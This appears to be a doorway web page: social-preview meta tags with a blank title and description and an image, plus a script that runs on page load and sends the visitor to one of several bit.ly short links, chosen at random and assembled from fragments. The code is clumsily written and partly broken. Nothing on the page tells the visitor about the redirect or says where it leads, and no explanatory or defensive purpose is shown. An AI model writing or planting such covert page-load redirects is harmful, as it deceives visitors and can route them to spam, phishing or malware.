<meta property="og:title" content=" ..">
<meta property="og:description" content="
                               

....

">                    
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="
https://blogger.googleusercontent.com/img/a/AVvXsEj2LoMuMhASLkLixgvxvBSU9WpOKwnpsVfX7o2bw2UbNdVUVqGGrUnZ-aK0PkM2aCbd1MPicBB8T6mNtB2PCQ0GTUfv7aKdDRc3yFbfwoMuue-zTM1YBN67d-Yd8st_Qhop9E8ryOKu2MLge-XnQgAW0lUtUhVKsWVs2BOl8-NE9jP0erCIlzGwp9c9qA=s16000


">                             
<script type = "text/javascript">
function reDirect() {
a = location.href = "bit.ly/";
b = location.href = "pon";
c = location.href = "pona";
d = Math.ceil(Math.random() * 24);
a = "https://" + a + b + c + d ;
window.location = a
}
reDirect();
</script>
